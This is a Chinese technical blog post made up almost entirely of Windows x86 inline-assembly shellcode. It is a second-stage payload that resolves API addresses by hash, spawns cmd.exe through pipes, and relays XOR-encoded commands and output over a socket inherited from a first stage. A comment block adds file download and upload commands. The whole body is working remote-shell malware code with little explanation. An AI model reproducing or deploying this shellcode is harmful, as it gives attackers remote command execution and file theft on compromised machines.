Chinaunix首页 | 论坛 | 博客
  • 博客访问: 1202921
  • 博文数量: 272
  • 博客积分: 3899
  • 博客等级: 中校
  • 技术积分: 4734
  • 用 户 组: 普通用户
  • 注册时间: 2012-06-15 14:53
文章分类

全部博文(272)

文章存档

2012年(272)

分类: 服务器与存储

2012-06-26 13:19:21


点击(此处)折叠或打开

  1. // shellcode function
  2. void ShellCode()
  3. {
  4. __asm{
  5. PROC_BEGIN //C macro to begin proc
  6. jmp locate_addr
  7. func_start:
  8. pop edi ; get eip
  9. mov dword ptr [edi+_hsck], eax //保存stage1传来的socket handle
  10. mov eax, fs:30h
  11. mov eax, [eax+0Ch]
  12. mov esi, [eax+1Ch]
  13. lodsd
  14. mov ebp, [eax+8] ; base address of kernel32.dll
  15. mov esi, edi
  16. push _Knums
  17. pop ecx
  18. GetKFuncAddr: ; find functions from kernel32.dll
  19. call find_hashfunc_addr
  20. loop GetKFuncAddr
  21. push 3233h
  22. push 5F327377h ; ws2_32
  23. push esp
  24. call dword ptr [esi+_LoadLibraryA]
  25. mov ebp, eax ; base address of ws2_32.dll
  26. push _Wnums
  27. pop ecx
  28. GetWFuncAddr: ; find functions from ws2_32.dll
  29. call find_hashfunc_addr
  30. loop GetWFuncAddr
  31. push 1 ; sa.inherit=true
  32. push 0 ; sa.descriptor=NULL
  33. push 0x0C ; sa.sizeof(sa)=0x0c
  34. mov ebx, esp
  35. push 0xff
  36. push ebx
  37. lea edx, [esi+_hin0]
  38. push edx
  39. add edx, 4
  40. push edx
  41. call dword ptr [esi+_CreatePipe]
  42. push 0x305C
  43. push 0x65706970
  44. push 0x5C2E5C5C ; "\\.\pipe\0"
  45. mov edi, esp
  46. xor eax, eax
  47. push eax
  48. push eax
  49. push eax
  50. push eax
  51. push 0xff ; UNLIMITED_INSTANCES
  52. push eax ; TYPE_BYTE|READMODE_BYTE|WAIT
  53. push 0x40000003 ; ACCES_DUPLEX|FLAG_OVERLAPPED
  54. push edi ; pip="\\.\pipe\0"
  55. call dword ptr [esi+_CreateNamedPipeA]
  56. mov [esi+_hout1], eax
  57. xor eax, eax
  58. push eax
  59. push eax
  60. push 3 ; OPEN_EXISTING
  61. push ebx ; lap
  62. push eax
  63. push 0x02000000 ; MAXIMUM_ALLOWED
  64. push edi ; pip="\\.\pipe\0"
  65. call dword ptr [esi+_CreateFileA]
  66. mov [esi+_hout0], eax
  67. push 646D63h ; "cmd"
  68. lea edx, [esp]
  69. sub esp, 54h
  70. mov edi, esp
  71. push 14h
  72. pop ecx
  73. xor eax, eax
  74. stack_zero:
  75. mov [edi+ecx*4], eax
  76. loop stack_zero
  77. mov byte ptr [edi+10h], 44h ; si.cb = sizeof(si)
  78. inc byte ptr [edi+3Ch]
  79. inc byte ptr [edi+3Dh] ; si.flg=USESHOWWINDOW|USESTDHANDLES
  80. push [esi+_hin1]
  81. pop ebx
  82. mov [edi+48h], ebx ; si.stdinput
  83. push [esi+_hout0]
  84. pop ebx
  85. mov [edi+4Ch], ebx ; si.stdoutput
  86. mov [edi+50h], ebx ; si.stderror
  87. lea eax, [edi+10h]
  88. push edi
  89. push eax
  90. push ecx
  91. push ecx
  92. push ecx
  93. push 1 ; inherit=TRUE
  94. push ecx
  95. push ecx
  96. push edx ; "cmd"
  97. push ecx
  98. call dword ptr [esi+_CreateProcessA]
  99. push [edi]
  100. pop dword ptr [esi+_pi0]
  101. push [edi+4]
  102. pop dword ptr [esi+_pi1]
  103. push [esi+_hin1]
  104. call dword ptr [esi+_CloseHandle]
  105. push [esi+_hout0]
  106. call dword ptr [esi+_CloseHandle]
  107. add esp, 0x6C ; free sa struct and "\\.\pipe\0" string and si struct
  108. xor eax, eax
  109. push eax
  110. push 1
  111. push 1
  112. push eax
  113. call dword ptr [esi+_CreateEventA]
  114. mov [esi+_epip], eax
  115. xor ebx, ebx
  116. mov [esi+_lap+0x0C], ebx
  117. mov [esi+_lap+0x10], eax
  118. call dword ptr [esi+_WSACreateEvent] // WSACreateEvent();
  119. mov [esi+_esck], eax
  120. mov dword ptr [esi+_flg], 0
  121. k1:
  122. push 0x21 ; FD_READ|FD_CLOSE
  123. push [esi+_esck]
  124. push [esi+_hsck]
  125. call dword ptr [esi+_WSAEventSelect] // WSAEventSelect(_hsck, _esck, FD_READ|FD_CLOSE);
  126. xor eax, eax
  127. dec eax
  128. push eax
  129. inc eax
  130. push eax
  131. lea ebx, [esi+_epip]
  132. push ebx
  133. push 2
  134. call dword ptr [esi+_WaitForMultipleObjects] // WaitForMultipleObjects(2, _epip, FALSE, INFINITE);
  135. push eax
  136. lea ebx, [esi+_sbuf]
  137. push ebx
  138. push [esi+_esck]
  139. push [esi+_hsck]
  140. call dword ptr [esi+_WSAEnumNetworkEvents] // WSAEnumNetworkEvents(_hsck, _esck, _sbuf);
  141. push 0
  142. push dword ptr [esi+_esck]
  143. push dword ptr [esi+_hsck]
  144. call dword ptr [esi+_WSAEventSelect] // WSAEventSelect(_hsck, _esck, 0);
  145. push 0
  146. push esp
  147. push 0x8004667e
  148. push [esi+_hsck]
  149. call dword ptr [esi+_ioctlsocket]
  150. pop eax
  151. pop ecx ;
  152. jecxz k2
  153. dec ecx
  154. jnz k5
  155. push 0
  156. push 0x40
  157. lea edx, [esi+_sbuf]
  158. push edx
  159. push [esi+_hsck]
  160. call dword ptr [esi+_recv]
  161. lea edx, [esi+_sbuf]
  162. push eax
  163. pop ecx ;ecx字节数
  164. call xor_data
  165. //+-------------------------------------------
  166. // Add file download and upload function
  167. // 2004-06-09
  168. //
  169. // san
  170. //+-------------------------------------------
  171. cmp dword ptr [esi+_sbuf], 0xFF746567 ; "get "
  172. jz get_file
  173. cmp dword ptr [esi+_sbuf], 0xFF747570 ; "put "
  174. jz put_file
  175. cmp DWORD ptr [esi+_sbuf], 0x20786573 ; "*** " ***加空格, 安全退出
  176. jz k5
  177. restore:
  178. push 0
  179. lea ebx, [esi+_cnt]
  180. push ebx
  181. push eax ; size
  182. lea ebx, [esi+_sbuf]
  183. push ebx
  184. push [esi+_hin0]
  185. call [esi+_WriteFile] // WriteFile(_hin0, _sbuf, len, _cnt);
  186. k2:
  187. mov ecx, [esi+_flg]
  188. jecxz k3
  189. push eax
  190. lea ebx, [esi+_cnt]
  191. push ebx
  192. lea ebx, [esi+_lap]
  193. push ebx
  194. push [esi+_hout1]
  195. call dword ptr [esi+_GetOverlappedResult]
  196. xchg eax, ecx
  197. jecxz k5
  198. jmp k4
  199. k3:
  200. lea ebx, [esi+_lap]
  201. push ebx
  202. lea ebx, [esi+_cnt]
  203. push ebx
  204. push 0x40
  205. lea ebx, [esi+_pbuf]
  206. push ebx
  207. push [esi+_hout1]
  208. call dword ptr [esi+_ReadFile]
  209. inc dword ptr [esi+_flg]
  210. test eax, eax
  211. jz k1
  212. k4:
  213. lea edx, [esi+_pbuf]
  214. push [esi+_cnt]
  215. pop ecx
  216. call xor_data
  217. dec dword ptr [esi+_flg]
  218. push 0
  219. mov ebx, [esi+_cnt]
  220. push ebx
  221. lea ebx, [esi+_pbuf]
  222. push ebx
  223. push [esi+_hsck]
  224. call dword ptr [esi+_send]
  225. jmp k1
  226. k5:
  227. //int 3
  228. //push 0 //应该可以没有
  229. push [esi+_pi0] // 进程 handler
  230. call dword ptr [esi+_TerminateProcess] //结束掉cmd
  231. // call dword ptr [esi+_ExitThread]
  232. // call DWORD ptr [esi+_ExitProcess]
  233. push [esi+_pi0]
  234. push [esi+_pi1]
  235. push [esi+_hout1]
  236. push [esi+_hin0]
  237. call dword ptr [esi+_CloseHandle]
  238. call dword ptr [esi+_CloseHandle]
  239. call dword ptr [esi+_CloseHandle]
  240. call dword ptr [esi+_CloseHandle]
  241. push [esi+_hsck]
  242. call dword ptr [esi+_closesocket]
  243. // xor eax, eax
  244. // dec eax
  245. // push eax
  246. // call dword ptr [esi+_TerminateProcess] 结束当前进程
  247. // call dword ptr [esi+_ExitThread]
  248. // 返回stage1 恢复栈平衡
  249. //int 3
  250. add esp, 8h
  251. retn

阅读(1246) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~